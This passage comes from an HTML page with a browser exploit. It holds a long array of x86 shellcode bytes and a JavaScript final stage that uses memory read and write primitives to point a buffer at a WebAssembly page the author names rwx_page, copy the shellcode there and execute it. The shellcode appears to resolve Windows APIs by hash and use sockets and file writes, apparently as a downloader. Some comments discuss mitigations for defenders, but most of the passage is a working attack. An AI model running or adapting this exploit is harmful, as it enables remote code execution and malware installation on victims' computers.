	0x05, 0xE9, 0x80, 0xFE, 0xFF, 0xFF, 0xE9, 0x7B, 0xFE, 0xFF, 0xFF, 0x8B, 0x55, 0xFC, 0x52, 0xFF,
	0x95, 0x34, 0xFF, 0xFF, 0xFF, 0xFF, 0x95, 0x64, 0xFF, 0xFF, 0xFF, 0xB8, 0x01, 0x00, 0x00, 0x00,
	0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
	0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x45, 0xF4,
	0x00, 0x00, 0x00, 0x00, 0x8B, 0x45, 0x08, 0x50, 0xE8, 0x33, 0x07, 0x00, 0x00, 0x83, 0xC4, 0x04,
	0x89, 0x45, 0xF0, 0x8B, 0x4D, 0x0C, 0x51, 0xE8, 0x24, 0x07, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89,
	0x45, 0xEC, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x09, 0x8B, 0x55, 0xFC, 0x83, 0xC2,
	0x01, 0x89, 0x55, 0xFC, 0x8B, 0x45, 0xFC, 0x3B, 0x45, 0xF0, 0x7D, 0x17, 0x8B, 0x4D, 0x08, 0x0F,
	0xBE, 0x11, 0x03, 0x55, 0xF8, 0x89, 0x55, 0xF8, 0x8B, 0x45, 0x08, 0x83, 0xC0, 0x01, 0x89, 0x45,
	0x08, 0xEB, 0xD8, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x09, 0x8B, 0x4D, 0xFC, 0x83,
	0xC1, 0x01, 0x89, 0x4D, 0xFC, 0x8B, 0x55, 0xFC, 0x3B, 0x55, 0xEC, 0x7D, 0x17, 0x8B, 0x45, 0x0C,
	0x0F, 0xBE, 0x08, 0x03, 0x4D, 0xF4, 0x89, 0x4D, 0xF4, 0x8B, 0x55, 0x0C, 0x83, 0xC2, 0x01, 0x89,
	0x55, 0x0C, 0xEB, 0xD8, 0x8B, 0x45, 0xF8, 0x2B, 0x45, 0xF4, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC,
	0x55, 0x8B, 0xEC, 0x81, 0xEC, 0x1C, 0x01, 0x00, 0x00, 0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00,
	0xC7, 0x45, 0xF4, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0x68, 0x48,
	0xE4, 0x16, 0xEA, 0xE8, 0x48, 0x02, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xE8, 0x68, 0x88,
	0xD1, 0xA6, 0xEA, 0xE8, 0x38, 0x02, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xF0, 0x6A, 0x00,
	0x68, 0x00, 0x01, 0x00, 0x00, 0x8D, 0x85, 0xE4, 0xFE, 0xFF, 0xFF, 0x50, 0xE8, 0x2F, 0x01, 0x00,
	0x00, 0x83, 0xC4, 0x0C, 0x6A, 0x00, 0x68, 0x00, 0x01, 0x00, 0x00, 0x8D, 0x8D, 0xE4, 0xFE, 0xFF,
	0xFF, 0x51, 0x8B, 0x55, 0x08, 0x52, 0xFF, 0x55, 0xF0, 0x89, 0x45, 0xEC, 0x83, 0x7D, 0xEC, 0x00,
	0x7D, 0x04, 0x33, 0xC0, 0xEB, 0x6A, 0x6A, 0x00, 0x8D, 0x85, 0xE4, 0xFE, 0xFF, 0xFF, 0x50, 0xE8,
	0x2C, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x50, 0x8D, 0x8D, 0xE4, 0xFE, 0xFF, 0xFF, 0x51, 0x8B,
	0x55, 0x08, 0x52, 0xFF, 0x55, 0xE8, 0x89, 0x45, 0xE4, 0x83, 0x7D, 0xE4, 0x00, 0x7D, 0x04, 0x33,
	0xC0, 0xEB, 0x3D, 0x8D, 0x45, 0xFC, 0x50, 0x8D, 0x4D, 0xF8, 0x51, 0x8B, 0x55, 0x08, 0x52, 0xE8,
	0x3C, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x0C, 0x85, 0xC0, 0x74, 0x22, 0x8B, 0x45, 0xFC, 0x50, 0x8B,
	0x4D, 0xF8, 0x51, 0x8D, 0x95, 0xE4, 0xFE, 0xFF, 0xFF, 0x52, 0xE8, 0x11, 0x05, 0x00, 0x00, 0x83,
	0xC4, 0x0C, 0x85, 0xC0, 0x74, 0x07, 0xC7, 0x45, 0xF4, 0x01, 0x00, 0x00, 0x00, 0x8B, 0x45, 0xF4,
	0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
	0x55, 0x8B, 0xEC, 0x81, 0xEC, 0xA0, 0x01, 0x00, 0x00, 0x68, 0xB1, 0x66, 0x28, 0x7F, 0xE8, 0x6D,
	0x01, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xF0, 0x68, 0xAF, 0x78, 0x49, 0x8B, 0xE8, 0x5D,
	0x01, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xF8, 0xB8, 0x02, 0x02, 0x00, 0x00, 0x66, 0x89,
	0x45, 0xFC, 0x8D, 0x8D, 0x60, 0xFE, 0xFF, 0xFF, 0x51, 0x0F, 0xB7, 0x55, 0xFC, 0x52, 0xFF, 0x55,
	0xF8, 0x89, 0x45, 0xF4, 0x83, 0x7D, 0xF4, 0x00, 0x75, 0x33, 0x0F, 0xB7, 0x85, 0x60, 0xFE, 0xFF,
	0xFF, 0x25, 0xFF, 0x00, 0x00, 0x00, 0x0F, 0xB6, 0xC8, 0x83, 0xF9, 0x02, 0x75, 0x18, 0x0F, 0xB7,
	0x95, 0x62, 0xFE, 0xFF, 0xFF, 0xC1, 0xEA, 0x08, 0x81, 0xE2, 0xFF, 0x00, 0x00, 0x00, 0x0F, 0xB6,
	0xC2, 0x83, 0xF8, 0x02, 0x75, 0x07, 0xB8, 0x01, 0x00, 0x00, 0x00, 0xEB, 0x05, 0xFF, 0x55, 0xF0,
	0x33, 0xC0, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
	0x55, 0x8B, 0xEC, 0x51, 0x8B, 0x45, 0x08, 0x89, 0x45, 0xFC, 0x83, 0x7D, 0x0C, 0x00, 0x74, 0x1C,
	0x8B, 0x4D, 0xFC, 0x8A, 0x55, 0x10, 0x88, 0x11, 0x8B, 0x45, 0xFC, 0x83, 0xC0, 0x01, 0x89, 0x45,
	0xFC, 0x8B, 0x4D, 0x0C, 0x83, 0xE9, 0x01, 0x89, 0x4D, 0x0C, 0xEB, 0xDE, 0x8B, 0x45, 0x08, 0x8B,
	0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
	0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x83, 0x7D, 0x08, 0x00, 0x74, 0x06, 0x83, 0x7D, 0x0C, 0x00,
	0x75, 0x04, 0x33, 0xC0, 0xEB, 0x3C, 0x8B, 0x45, 0x08, 0x89, 0x45, 0xF8, 0x8B, 0x4D, 0x10, 0x89,
	0x4D, 0xFC, 0x8B, 0x55, 0x10, 0x83, 0xEA, 0x01, 0x89, 0x55, 0x10, 0x83, 0x7D, 0xFC, 0x00, 0x74,
	0x1E, 0x8B, 0x45, 0x08, 0x8B, 0x4D, 0x0C, 0x8A, 0x11, 0x88, 0x10, 0x8B, 0x45, 0x08, 0x83, 0xC0,
	0x01, 0x89, 0x45, 0x08, 0x8B, 0x4D, 0x0C, 0x83, 0xC1, 0x01, 0x89, 0x4D, 0x0C, 0xEB, 0xCD, 0x8B,
	0x45, 0xF8, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
	0x55, 0x8B, 0xEC, 0x51, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x09, 0x8B, 0x45, 0xFC,
	0x83, 0xC0, 0x01, 0x89, 0x45, 0xFC, 0x8B, 0x4D, 0xFC, 0x3B, 0x4D, 0x0C, 0x7D, 0x2A, 0x8B, 0x55,
	0x08, 0x03, 0x55, 0xFC, 0x0F, 0xBE, 0x02, 0x33, 0x45, 0x10, 0x8B, 0x4D, 0x08, 0x03, 0x4D, 0xFC,
	0x88, 0x01, 0x8B, 0x55, 0x08, 0x03, 0x55, 0xFC, 0x0F, 0xBE, 0x02, 0x03, 0x45, 0x14, 0x8B, 0x4D,
	0x08, 0x03, 0x4D, 0xFC, 0x88, 0x01, 0xEB, 0xC5, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC,
	0x55, 0x8B, 0xEC, 0x81, 0xEC, 0xE8, 0x00, 0x00, 0x00, 0xC7, 0x45, 0x98, 0x2E, 0x00, 0x44, 0x00,
	0xC7, 0x45, 0x9C, 0x4C, 0x00, 0x4C, 0x00, 0xC7, 0x45, 0xA0, 0x00, 0x00, 0x00, 0x00, 0x64, 0xA1,
	0x30, 0x00, 0x00, 0x00, 0x89, 0x45, 0xC4, 0x8B, 0x4D, 0xC4, 0x8B, 0x51, 0x0C, 0x89, 0x55, 0xC0,
	0x8B, 0x45, 0xC0, 0x8B, 0x48, 0x0C, 0x89, 0x4D, 0xBC, 0x8B, 0x55, 0xBC, 0x89, 0x55, 0xD8, 0x8B,
	0x45, 0xD8, 0x83, 0x78, 0x18, 0x00, 0x0F, 0x84, 0x16, 0x03, 0x00, 0x00, 0xC7, 0x45, 0xF8, 0x00,
	0x00, 0x00, 0x00, 0x8B, 0x4D, 0xD8, 0x8B, 0x51, 0x18, 0x89, 0x55, 0xE4, 0x8B, 0x45, 0xD8, 0x8B,
	0x48, 0x2C, 0x8B, 0x50, 0x30, 0x89, 0x4D, 0xA4, 0x89, 0x55, 0xA8, 0x8B, 0x45, 0xE4, 0x8B, 0x4D,
	0xE4, 0x03, 0x48, 0x3C, 0x89, 0x4D, 0xCC, 0xBA, 0x08, 0x00, 0x00, 0x00, 0x6B, 0xC2, 0x00, 0x8B,
	0x4D, 0xCC, 0x8B, 0x54, 0x01, 0x78, 0x89, 0x55, 0xC8, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x6B, 0xC8,
	0x00, 0x8B, 0x55, 0xCC, 0x8B, 0x44, 0x0A, 0x7C, 0x89, 0x45, 0xB0, 0x8B, 0x4D, 0xD8, 0x8B, 0x11,
	0x89, 0x55, 0xD8, 0x83, 0x7D, 0xC8, 0x00, 0x75, 0x02, 0xEB, 0x94, 0xC7, 0x45, 0xEC, 0x00, 0x00,
	0x00, 0x00, 0xEB, 0x09, 0x8B, 0x45, 0xEC, 0x83, 0xC0, 0x01, 0x89, 0x45, 0xEC, 0x0F, 0xB7, 0x4D,
	0xA6, 0x39, 0x4D, 0xEC, 0x73, 0x45, 0x8B, 0x55, 0xA8, 0x03, 0x55, 0xEC, 0x89, 0x55, 0xFC, 0x8B,
	0x45, 0xF8, 0xC1, 0xE8, 0x0D, 0x8B, 0x4D, 0xF8, 0xC1, 0xE1, 0x13, 0x0B, 0xC1, 0x89, 0x45, 0xF8,
	0x8B, 0x55, 0xFC, 0x0F, 0xBE, 0x02, 0x83, 0xF8, 0x61, 0x7C, 0x12, 0x8B, 0x4D, 0xFC, 0x0F, 0xBE,
	0x11, 0x8B, 0x45, 0xF8, 0x8D, 0x4C, 0x10, 0xE0, 0x89, 0x4D, 0xF8, 0xEB, 0x0C, 0x8B, 0x55, 0xFC,
	0x0F, 0xBE, 0x02, 0x03, 0x45, 0xF8, 0x89, 0x45, 0xF8, 0xEB, 0xA9, 0x8B, 0x4D, 0xE4, 0x03, 0x4D,
	0xC8, 0x89, 0x4D, 0xE0, 0x8B, 0x55, 0xE0, 0x8B, 0x42, 0x18, 0x89, 0x45, 0xB8, 0x8B, 0x4D, 0xE0,
	0x8B, 0x55, 0xE4, 0x03, 0x51, 0x20, 0x89, 0x55, 0xD0, 0xC7, 0x45, 0xEC, 0x00, 0x00, 0x00, 0x00,
	0xEB, 0x09, 0x8B, 0x45, 0xEC, 0x83, 0xC0, 0x01, 0x89, 0x45, 0xEC, 0x8B, 0x4D, 0xEC, 0x3B, 0x4D,
	0xB8, 0x0F, 0x83, 0x16, 0x02, 0x00, 0x00, 0xC7, 0x45, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x55,
	0xD0, 0x8B, 0x02, 0x03, 0x45, 0xE4, 0x89, 0x45, 0xB4, 0x8B, 0x4D, 0xD0, 0x83, 0xC1, 0x04, 0x89,
	0x4D, 0xD0, 0x8B, 0x55, 0xB4, 0x89, 0x55, 0xFC, 0x8B, 0x45, 0xF4, 0xC1, 0xE8, 0x0D, 0x8B, 0x4D,
	0xF4, 0xC1, 0xE1, 0x13, 0x0B, 0xC1, 0x89, 0x45, 0xF4, 0x8B, 0x55, 0xFC, 0x0F, 0xBE, 0x02, 0x03,
	0x45, 0xF4, 0x89, 0x45, 0xF4, 0x8B, 0x4D, 0xFC, 0x83, 0xC1, 0x01, 0x89, 0x4D, 0xFC, 0x8B, 0x55,
	0xFC, 0x0F, 0xBE, 0x42, 0xFF, 0x85, 0xC0, 0x75, 0xCF, 0x8B, 0x4D, 0xF4, 0x03, 0x4D, 0xF8, 0x89,
	0x4D, 0xF4, 0x8B, 0x55, 0xF4, 0x3B, 0x55, 0x08, 0x0F, 0x85, 0xAA, 0x01, 0x00, 0x00, 0x8B, 0x45,
	0xE0, 0x8B, 0x4D, 0xE4, 0x03, 0x48, 0x24, 0x8B, 0x55, 0xEC, 0x66, 0x8B, 0x04, 0x51, 0x66, 0x89,
	0x45, 0xD4, 0x8B, 0x4D, 0xE0, 0x8B, 0x55, 0xE4, 0x03, 0x51, 0x1C, 0x0F, 0xB7, 0x45, 0xD4, 0x8B,
	0x4D, 0xE4, 0x03, 0x0C, 0x82, 0x89, 0x4D, 0xDC, 0x8B, 0x55, 0xDC, 0x3B, 0x55, 0xE0, 0x72, 0x0B,
	0x8B, 0x45, 0xE0, 0x03, 0x45, 0xB0, 0x39, 0x45, 0xDC, 0x76, 0x0D, 0x8B, 0x45, 0xDC, 0xE9, 0x71,
	0x01, 0x00, 0x00, 0xE9, 0x60, 0x01, 0x00, 0x00, 0xC7, 0x45, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x8B,
	0x4D, 0xDC, 0x03, 0x4D, 0xF0, 0x0F, 0xBE, 0x11, 0x83, 0xFA, 0x2E, 0x74, 0x20, 0x8B, 0x45, 0xDC,
	0x03, 0x45, 0xF0, 0x66, 0x0F, 0xBE, 0x08, 0x8B, 0x55, 0xF0, 0x66, 0x89, 0x8C, 0x55, 0x18, 0xFF,
	0xFF, 0xFF, 0x8B, 0x45, 0xF0, 0x83, 0xC0, 0x01, 0x89, 0x45, 0xF0, 0xEB, 0xD2, 0xC7, 0x45, 0xF4,
	0x00, 0x00, 0x00, 0x00, 0x8B, 0x4D, 0xF0, 0x8B, 0x55, 0xDC, 0x8D, 0x44, 0x0A, 0x01, 0x89, 0x45,
	0xFC, 0x8B, 0x4D, 0xF4, 0xC1, 0xE9, 0x0D, 0x8B, 0x55, 0xF4, 0xC1, 0xE2, 0x13, 0x0B, 0xCA, 0x89,
	0x4D, 0xF4, 0x8B, 0x45, 0xFC, 0x0F, 0xBE, 0x08, 0x03, 0x4D, 0xF4, 0x89, 0x4D, 0xF4, 0x8B, 0x55,
	0xFC, 0x83, 0xC2, 0x01, 0x89, 0x55, 0xFC, 0x8B, 0x45, 0xFC, 0x0F, 0xBE, 0x48, 0xFF, 0x85, 0xC9,
	0x75, 0xCF, 0xC7, 0x45, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x55, 0xE8, 0x0F, 0xB7, 0x44, 0x55,
	0x98, 0x85, 0xC0, 0x74, 0x27, 0x8B, 0x4D, 0xF0, 0x8B, 0x55, 0xE8, 0x66, 0x8B, 0x44, 0x55, 0x98,
	0x66, 0x89, 0x84, 0x4D, 0x18, 0xFF, 0xFF, 0xFF, 0x8B, 0x4D, 0xF0, 0x83, 0xC1, 0x01, 0x89, 0x4D,
	0xF0, 0x8B, 0x55, 0xE8, 0x83, 0xC2, 0x01, 0x89, 0x55, 0xE8, 0xEB, 0xCD, 0x33, 0xC0, 0x8B, 0x4D,
	0xF0, 0x66, 0x89, 0x84, 0x4D, 0x18, 0xFF, 0xFF, 0xFF, 0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00,
	0xC7, 0x45, 0xE8, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x09, 0x8B, 0x55, 0xE8, 0x83, 0xC2, 0x01, 0x89,
	0x55, 0xE8, 0x8B, 0x45, 0xF0, 0x8D, 0x4C, 0x00, 0x02, 0x39, 0x4D, 0xE8, 0x73, 0x49, 0x8B, 0x55,
	0xE8, 0x8D, 0x84, 0x15, 0x18, 0xFF, 0xFF, 0xFF, 0x89, 0x45, 0xFC, 0x8B, 0x4D, 0xF8, 0xC1, 0xE9,
	0x0D, 0x8B, 0x55, 0xF8, 0xC1, 0xE2, 0x13, 0x0B, 0xCA, 0x89, 0x4D, 0xF8, 0x8B, 0x45, 0xFC, 0x0F,
	0xBE, 0x08, 0x83, 0xF9, 0x61, 0x7C, 0x12, 0x8B, 0x55, 0xFC, 0x0F, 0xBE, 0x02, 0x8B, 0x4D, 0xF8,
	0x8D, 0x54, 0x01, 0xE0, 0x89, 0x55, 0xF8, 0xEB, 0x0C, 0x8B, 0x45, 0xFC, 0x0F, 0xBE, 0x08, 0x03,
	0x4D, 0xF8, 0x89, 0x4D, 0xF8, 0xEB, 0xA2, 0x8B, 0x55, 0xF8, 0x03, 0x55, 0xF4, 0x89, 0x55, 0x08,
	0x68, 0x4C, 0x77, 0xD6, 0x07, 0xE8, 0xC6, 0xFC, 0xFF, 0xFF, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xAC,
	0x8D, 0x85, 0x18, 0xFF, 0xFF, 0xFF, 0x50, 0xFF, 0x55, 0xAC, 0x8B, 0x4D, 0x08, 0x51, 0xE8, 0xAD,
	0xFC, 0xFF, 0xFF, 0x83, 0xC4, 0x04, 0xEB, 0x0C, 0xE9, 0xD5, 0xFD, 0xFF, 0xFF, 0xE9, 0xDD, 0xFC,
	0xFF, 0xFF, 0x33, 0xC0, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
	0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x18, 0x68, 0x2D, 0x57, 0xAE, 0x5B, 0xE8, 0x80, 0xFC, 0xFF, 0xFF,
	0x83, 0xC4, 0x04, 0x89, 0x45, 0xF0, 0x68, 0xDA, 0xF6, 0xDA, 0x4F, 0xE8, 0x70, 0xFC, 0xFF, 0xFF,
	0x83, 0xC4, 0x04, 0x89, 0x45, 0xF4, 0x68, 0xC6, 0x96, 0x87, 0x52, 0xE8, 0x60, 0xFC, 0xFF, 0xFF,
	0x83, 0xC4, 0x04, 0x89, 0x45, 0xEC, 0x83, 0x7D, 0x08, 0x00, 0x74, 0x0C, 0x83, 0x7D, 0x0C, 0x00,
	0x74, 0x06, 0x83, 0x7D, 0x10, 0x00, 0x75, 0x04, 0x33, 0xC0, 0xEB, 0x73, 0x6A, 0x00, 0x68, 0x80,
	0x00, 0x00, 0x00, 0x6A, 0x02, 0x6A, 0x00, 0x6A, 0x00, 0x68, 0x00, 0x00, 0x00, 0xC0, 0x8B, 0x45,
	0x08, 0x50, 0xFF, 0x55, 0xF4, 0x89, 0x45, 0xFC, 0x83, 0x7D, 0xFC, 0xFF, 0x75, 0x04, 0x33, 0xC0,
	0xEB, 0x4D, 0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x45, 0xE8, 0x00, 0x00, 0x00, 0x00,
	0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0x51, 0x8B, 0x55, 0x10, 0x52, 0x8B, 0x45, 0x0C, 0x50, 0x8B, 0x4D,
	0xFC, 0x51, 0xFF, 0x55, 0xF0, 0x8B, 0x55, 0x10, 0x2B, 0x55, 0xF8, 0x89, 0x55, 0x10, 0x8B, 0x45,
	0x0C, 0x03, 0x45, 0xF8, 0x89, 0x45, 0x0C, 0x83, 0x7D, 0x10, 0x00, 0x77, 0xD3, 0x83, 0x7D, 0xFC,
	0x00, 0x74, 0x07, 0x8B, 0x4D, 0xFC, 0x51, 0xFF, 0x55, 0xEC, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x8B,
	0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
	0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x8B, 0x45, 0x08, 0x89, 0x45, 0xFC, 0x8B, 0x4D, 0xFC, 0x0F,
	0xBE, 0x11, 0x89, 0x55, 0xF8, 0x8B, 0x45, 0xFC, 0x83, 0xC0, 0x01, 0x89, 0x45, 0xFC, 0x83, 0x7D,
	0xF8, 0x00, 0x74, 0x02, 0xEB, 0xE6, 0x8B, 0x45, 0xFC, 0x2B, 0x45, 0x08, 0x83, 0xE8, 0x01, 0x8B,
	0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
	0x55, 0x8B, 0xEC, 0x81, 0xEC, 0x40, 0x04, 0x00, 0x00, 0xC7, 0x45, 0xEC, 0x00, 0x00, 0x00, 0x00,
	0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0x68, 0x88, 0xD1, 0xA6, 0xEA, 0xE8, 0x5F, 0xFB, 0xFF,
	0xFF, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xE8, 0x68, 0x48, 0xE4, 0x16, 0xEA, 0xE8, 0x4F, 0xFB, 0xFF,
	0xFF, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xE4, 0x68, 0x50, 0x7D, 0xA3, 0x7E, 0xE8, 0x3F, 0xFB, 0xFF,
	0xFF, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xDC, 0x68, 0x9F, 0x1A, 0xFF, 0x08, 0xE8, 0x2F, 0xFB, 0xFF,
	0xFF, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xC4, 0x68, 0x0F, 0x43, 0xE8, 0x29, 0xE8, 0x1F, 0xFB, 0xFF,
	0xFF, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xE0, 0x6A, 0x00, 0x6A, 0x11, 0x8D, 0x45, 0xC8, 0x50, 0xE8,
	0x1C, 0xFA, 0xFF, 0xFF, 0x83, 0xC4, 0x0C, 0x6A, 0x00, 0x6A, 0x11, 0x8D, 0x4D, 0xC8, 0x51, 0x8B,
	0x55, 0x08, 0x52, 0xFF, 0x55, 0xE8, 0x89, 0x45, 0xFC, 0x83, 0x7D, 0xFC, 0x00, 0x7D, 0x07, 0x33,
	0xC0, 0xE9, 0xEF, 0x00, 0x00, 0x00, 0x6A, 0x00, 0x8D, 0x45, 0xC8, 0x50, 0xE8, 0x1F, 0xFF, 0xFF,
	0xFF, 0x83, 0xC4, 0x04, 0x50, 0x8D, 0x4D, 0xC8, 0x51, 0x8B, 0x55, 0x08, 0x52, 0xFF, 0x55, 0xE4,
	0x89, 0x45, 0xEC, 0x83, 0x7D, 0xEC, 0x00, 0x7D, 0x07, 0x33, 0xC0, 0xE9, 0xC5, 0x00, 0x00, 0x00,
	0x8D, 0x45, 0xC8, 0x50, 0xFF, 0x55, 0xE0, 0x89, 0x45, 0xF8, 0x8B, 0x4D, 0xF8, 0x51, 0xFF, 0x55,
	0xDC, 0x89, 0x45, 0xF4, 0x6A, 0x00, 0x8B, 0x55, 0xF8, 0x52, 0x8B, 0x45, 0xF4, 0x50, 0xE8, 0xAD,
	0xF9, 0xFF, 0xFF, 0x83, 0xC4, 0x0C, 0x8B, 0x4D, 0xF8, 0x89, 0x4D, 0xC0, 0x6A, 0x00, 0x68, 0x00,
	0x04, 0x00, 0x00, 0x8D, 0x95, 0xC0, 0xFB, 0xFF, 0xFF, 0x52, 0xE8, 0x91, 0xF9, 0xFF, 0xFF, 0x83,
	0xC4, 0x0C, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x00, 0x68, 0x00, 0x04, 0x00, 0x00,
	0x8D, 0x85, 0xC0, 0xFB, 0xFF, 0xFF, 0x50, 0x8B, 0x4D, 0x08, 0x51, 0xFF, 0x55, 0xE8, 0x89, 0x45,
	0xF0, 0x83, 0x7D, 0xF0, 0x00, 0x7E, 0x2F, 0x8B, 0x55, 0xF0, 0x52, 0x8D, 0x85, 0xC0, 0xFB, 0xFF,
	0xFF, 0x50, 0x8B, 0x4D, 0xF4, 0x03, 0x4D, 0xFC, 0x51, 0xE8, 0x92, 0xF9, 0xFF, 0xFF, 0x83, 0xC4,
	0x0C, 0x8B, 0x55, 0xFC, 0x03, 0x55, 0xF0, 0x89, 0x55, 0xFC, 0x8B, 0x45, 0xFC, 0x3B, 0x45, 0xF8,
	0x75, 0x02, 0xEB, 0x02, 0xEB, 0xB3, 0x83, 0x7D, 0xF4, 0x00, 0x74, 0x14, 0x6A, 0x11, 0x6A, 0x1A,
	0x8B, 0x4D, 0xF8, 0x51, 0x8B, 0x55, 0xF4, 0x52, 0xE8, 0xC3, 0xF9, 0xFF, 0xFF, 0x83, 0xC4, 0x10,
	0x8B, 0x45, 0x0C, 0x8B, 0x4D, 0xF4, 0x89, 0x08, 0x8B, 0x55, 0x10, 0x8B, 0x45, 0xF8, 0x89, 0x02,
	0xB8, 0x01, 0x00, 0x00, 0x00, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC
    ]
    // Final stage: reads a 64-bit value at wasm_instance_addr + 0x40, keeps
    // its low 32 bits in `rwx_page`, writes that value at the address the
    // author calls the buffer's backing store, copies the `shellcode` bytes
    // through `data_view`, and finally calls the exported wasm function `f`.
    // Defender note: this stage depends on the wasm instance exposing a page
    // that is writable and executable at once (per the author's variable
    // name); W^X enforcement for JIT/wasm code pages and a sandboxed renderer
    // are the mitigations aimed at this step. The offsets 0x10 and 0x40 are
    // layout-dependent and the page does not state the build they apply to.
    // The buffer is sized at 8 bytes per shellcode element, although the loop
    // below writes one byte per element.
    var data_buf = new ArrayBuffer(shellcode.length * 8);
    var data_view = new DataView(data_buf);
    var data_buf_address = addrof(data_buf) - 1;
    //print("[*]data_buf_address:0x" + data_buf_address.toString(16));
    // mind the offset
    var buf_backing_store_addr = data_buf_address + 0x10;
    // alert("buf_backing_store_addr:0x" + buf_backing_store_addr.toString(16));
    // mind the offset
    let rwx_page = lower(read64(wasm_instance_addr + 0x40));
    //print("[*] rwx_page addr 0x" + (rwx_page).toString(16));
    write64(buf_backing_store_addr, rwx_page);
    //print("write to: 0x" + buf_backing_store_addr.toString(16) + " data:0x" + rwx_page.toString(16));
    // Read-back of the value just written; `tmp2` is only referenced from the
    // commented-out print below.
    var tmp2 = read64(buf_backing_store_addr);
    //print("tmp2:0x" + tmp2.toString(16));
    for (let i = 0; i < shellcode.length; i++) {
        // setUint8 takes (byteOffset, value); the third argument is ignored
        data_view.setUint8(i, shellcode[i], true);
    }
    //alert("[*] code written successfully" + rwx_page.toString(16));
    f();
    // alert("[*] execution finished")
</script>

</html>